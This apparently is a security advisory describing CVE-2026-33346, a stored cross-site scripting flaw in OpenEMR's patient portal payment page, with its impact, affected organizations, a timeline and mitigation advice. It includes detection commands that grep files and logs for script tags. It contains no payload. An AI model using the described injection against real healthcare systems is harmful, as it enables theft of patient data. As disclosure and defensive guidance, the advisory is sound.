OpenEMR has stored XSS in portal_payment.php via Unescaped table_args

The impact of this XSS vulnerability is significant, as it allows attackers to execute arbitrary JavaScript code within the context of a staff user's session. This could enable attackers to steal sensitive patient data, including Protected Health Information (PHI), manipulate payment records, or even gain unauthorized access to the OpenEMR system. The stored nature of the vulnerability means the malicious payload persists, potentially affecting multiple staff members over time. Successful exploitation could lead to regulatory fines (HIPAA), reputational damage, and disruption of healthcare services. While no direct precedent exists for this specific OpenEMR vulnerability, XSS vulnerabilities in healthcare applications are a known attack vector, and the potential for data exfiltration and system compromise is high.

Healthcare organizations utilizing OpenEMR, particularly those with patient portals and staff responsible for reviewing payment submissions, are at risk. Organizations relying on legacy OpenEMR configurations or those with limited security expertise are especially vulnerable. Shared hosting environments where multiple OpenEMR instances reside on the same server could also experience cross-contamination if one instance is compromised.

• php: Examine portal/lib/paylib.php and portal/portal_payment.php for unsanitized user input.

grep -r '<script' /path/to/OpenEMR/portal/lib/paylib.php /path/to/OpenEMR/portal/portal_payment.php

• php: Monitor OpenEMR logs for unusual JavaScript execution attempts.

journalctl -u apache2 -f | grep 'script'  # Assuming Apache is used

• generic web: Monitor access logs for requests containing suspicious JavaScript payloads targeting the payment portal. • generic web: Check response headers for signs of XSS, such as Content-Security-Policy (CSP) misconfigurations.

1. 2026-03-19Disclosure

   disclosure

2. 2026-03-19Patch

   patch

1. 已保留2026-03-18
2. 发布日期2026-03-19
3. 修改日期2026-03-20
4. EPSS 更新日期2026-03-27

The primary mitigation for CVE-2026-33346 is to immediately upgrade OpenEMR to version 8.0.0.2 or later. If upgrading is not immediately feasible, consider implementing temporary workarounds such as strict input validation and output encoding on the portal/lib/paylib.php and portal/portal_payment.php files. Web application firewalls (WAFs) configured to detect and block XSS payloads targeting these specific files can also provide a layer of protection. Regularly review OpenEMR logs for suspicious activity, particularly related to patient portal payments, and implement a robust security monitoring system. After upgrading, confirm the fix by attempting to submit a payment with a known malicious JavaScript payload and verifying that it is properly sanitized and does not execute.